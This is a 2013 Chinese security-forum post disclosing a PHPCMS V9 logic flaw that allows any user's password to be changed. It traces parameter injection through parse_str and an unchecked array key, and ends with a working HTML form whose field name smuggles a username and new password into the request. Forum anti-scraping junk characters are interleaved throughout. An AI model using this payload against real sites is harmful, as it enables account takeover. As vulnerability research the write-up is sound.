找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2015|回复: 0
打印 上一主题 下一主题

PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 14:46:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
提到的通行证的代码:1 x6 u3 Y- s% [- B& l  y" W1 G

% `* q0 L+ F' r" N9 V/ I
3 b& Y  s$ L! Nparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
7 O0 _0 n& |9 \* ]6 \( `1 M7 |
6 y7 W$ k/ m' J在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
5 a$ C! I) y' [* w9 @- R4 K$ y, d2 W
( }& j! V% m; r8 |我把它留给了你们。& K2 E/ `2 J6 J6 l; f! k
不知道你们发现了它没有。, M) a1 j0 L+ K" d+ u" [( e
5 k+ f6 d3 H; M# u, ^
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。
" `; A7 u3 l4 b! u1 W5 h" o' F- o' u0 t+ V6 f. G, |5 O
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。* i- Y0 v( p$ H2 B$ O2 d! z

7 A: v, N/ n. Q# q0 C5 }也就是
4 u- G4 Z& ~, D5 P9 g- D% B
8 ~4 ~$ y# i$ S1 @; o! yusername=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。
! q& K' A: E1 Q5 Z6 m+ V3 u9 N9 u
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
+ |* V3 F1 F5 X( P% }5 ]9 d  n% P+ L4 D1 ?& @& @" n7 \  Z8 A  B3 F5 m

0 C" |( B" x0 b/ B+ O$ @- k# t( _其实我们有这样的机会,看看代码,如下:$ E9 O% n  A- l  X

. A8 T# Q3 _4 ?! i; E/ L8 J1 f7 a# o) D, T0 x: j  |8 D
public function auth_data($data) {
0 `9 ~# M' L2 w" ]* W! a, K                $s = $sep = '';/ K; T- G+ U1 J3 e% F
                foreach($data as $k => $v) {
2 Q! M  w2 |! N! S" q; O# J% b                        if(is_array($v)) {
& k) n: |3 `" B( l4 j4 u. [                                $s2 = $sep2 = '';; n3 K0 M7 G" v5 I
                                foreach($v as $k2 => $v2) {7 [1 T: D* y* W8 A) u  a
                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
& Y- n! L2 ]8 m  {. X! K5 ~                                        $sep2 = '&';
/ h+ J* @& B. p6 z                                }. R& G9 c$ r; m0 h* y+ f- z6 h" b
                                $s .= $sep.$s2;
' {: C5 K2 z' M" ?, o+ {  K3 N6 i                        } else {
. Z7 v7 @" h& N% J1 G/ e1 r                                $s .= "$sep$k=".$this->_ps_stripslashes($v);+ J: P+ K# D4 o, L* T" d/ r
                        }
! V: x1 ?( t& P( y                        $sep = '&';
2 U# h- S  G9 W                }
2 e2 l: \9 q0 L% Y5 y+ |4 v. t% }! @1 k' Y/ n
                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));& F' D: y1 f& J
                return $auth_s;) m; `; j( M/ `
        }9 ]8 u; g1 o# H6 w

) ~( [0 I/ n- O7 M可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
/ a$ \$ e' D  q' P1 I- a% D8 c5 S; m. T( {# k, t) G
举个例子
3 p- J# Y% ^9 A, Y% K# r0 j. d; ~2 A- p( O
$a[aaa=a&bbb] = 'a';" p3 u2 _4 I, }7 |# J
3 T2 {9 Q1 ~! q& }; d5 V
会变成aaa=a&bbb=a( H8 C  O5 F: n) L8 Z9 F" X
) G# F: d+ f& }; r& H' r
明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
3 t# u5 {/ Q4 Q* H3 O5 ?- @' f* W- q( |) S9 j" S5 P
这个时候,我们可以再去看一个函数。' k/ L& j" e3 s

# u% d$ i  A4 ~7 l4 ]; A就在这个文件内:
' M3 M5 g2 R" x/ l/ U. U! U( C! @
' E! D' P* `3 p# y& k. U# C- W& x/ m. S) u* x( Y
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
/ o! x' X7 D% ?1 q& L. f                if($email && !$this->_is_email($email)) {
7 x' @! w8 ^2 K) B5 f$ f2 g& g% l2 c                        return -4;% b( l$ i/ a5 E: I% m  c  U
                }/ P1 t5 t8 d% P. C
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
& f; M: L: q0 I6 B: U/ C        }
5 Y8 l2 E( U2 ~$ t; p: Q
% O" R+ p5 w2 ?: n$ c+ K* h+ L这是向通行证发了这样一个请求。
/ E/ c1 m+ Z1 C% i& m- i+ B/ t9 w) M3 h
我们再跟到通信证代码里去看看,就会有所发现。
( _) z- l1 ?( \$ e* z& A# d7 A- H' P' ~& d) _% d* K7 B8 ~
) F# I/ Z4 ]7 _0 b1 F4 ]& z
public function edit() {+ m$ o: J9 ^- r1 h" j/ x7 ^: |
//能省就省,太长了不是吗?0 }+ Z6 S* x" h+ s, n
% N4 n. V( _4 s- R) t$ S% y
if($this->username) {5 x8 m3 P1 c; \1 E0 i+ ~* w
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。6 ~0 L; x: G( f9 Z
                                $res = $this->db->update($data, array('username'=>$this->username));/ d8 J4 y( D' w' w2 n% A% p. k
                        } else {
7 K% [9 Q  y- j                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);# \, A+ m7 @7 a# Y' m$ ~) z
                                $res = $this->db->update($data, array('uid'=>$this->uid));; w+ j1 b# {& s8 C
                        }
- W- z1 w3 o# x2 m
* O4 p7 R1 }8 F* Q- e# q' Q好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:1 z& l' h9 P/ F3 K8 Y3 t1 r* P

8 m$ F. R# q& M: W" u3 Epublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
3 H0 T1 @' s! {6 E0 g7 G
$ R" H9 {7 Q& _8 X8 A很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
. S  ]. H4 z  x/ t/ F: F! v9 r6 E5 R' C, ?$ i7 G
我当然找到了:
8 N/ c# `# b$ N$ Sphpcms9/phpcms/modules/member/index.php1 w# Q  l3 D# p
! B  }2 h2 [2 i: O: }$ U
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);8 l: T9 j) E3 |: f9 ^/ q
+ \+ k+ R) k' @) E
然后就没有然后了。; c5 \, A: n% ?- \

# i( w( A. i& V: ^<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
( g7 f& b" z5 ~, k                                <table width="100%" cellspacing="0" class="table_form">
8 Z* i5 G: _/ C( A                                        <tr>
: t; |, _" K* c- N                                                <th width="80">邮箱:</th>        ( ]( C7 j9 l5 U$ ]
                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>" }# L* _+ h' C, h7 {
                                        </tr>2 d: K% R2 {7 A5 }5 J, e. v
                                        <tr>
' {; p* o" f, p, s. F1 E                                                <th width="80">原密码:</th>        7 m' `  g& }2 P2 C0 V: W
                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
* s( y+ \/ w# u6 E                                        </tr># s+ `; T! c) Q7 Y
                                        <tr>
% ~' p2 r( T( j% g1 d, j                                                <th>新密码:</th>" H6 @; R0 |3 F' [
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>) R/ ~6 O% D* A! `9 Z8 F
                                        </tr>- B* L- w2 W' t: o/ }  Z' `* C
                                        <th></th>5 T$ i1 J' l2 z
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td># s( d7 q8 X8 h( m3 O
                                        </tr>, U6 i, @: l; d: P8 C
                                </table>
& @* F5 c6 P8 l. o/ W1 E$ z3 Z( A# ?
                                - [! c/ y' S5 H9 ~0 P" S
                        </form>
/ E1 o% J* _9 j( d8 I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表